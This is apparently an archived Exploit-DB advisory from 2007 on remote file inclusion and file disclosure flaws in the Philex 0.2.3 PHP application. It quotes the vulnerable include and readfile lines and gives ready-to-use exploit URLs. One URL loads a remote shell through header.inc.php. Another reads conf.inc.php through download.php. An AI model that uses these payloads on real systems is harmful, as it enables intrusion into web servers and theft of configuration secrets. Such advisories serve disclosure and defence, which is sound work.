Philex <= 0.2.3 RFI / File Disclosure Remote Vulnerabilities

2007-03-23T00:00:00
ID EDB-ID:3552
Type exploitdb
Reporter GoLd_M
Modified 2007-03-23T00:00:00

Description

Philex <= 0.2.3 RFI / File Disclosure Remote Vulnerabilities. CVE-2007-1697,CVE-2007-1698. Webapps exploit for php platform

                                        
                                            ######################################################
# Philex 0.2.3 &lt;= Remote File(Disclosure/Include)Vulnerabilities
# D.Script: http://kent.dl.sourceforge.net/sourceforge/philex/philex_0.2.3.tgz
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
######################################################
# V.Code Include:                                    #
# &lt;?include $CssFile;?&gt;                              #
# Exploit Remote File Include:                       #
# [Path_Philex]/header.inc.php?CssFile=Shell         #
######################################################
# V.Code Disclosure:                                 #
# readfile($HTTP_GET_VARS["file"]);                  #
# Exploit Remote File Disclosure:                    #
# [Path_Philex]/download.php?file=conf.inc.php       #
######################################################

# milw0rm.com [2007-03-23]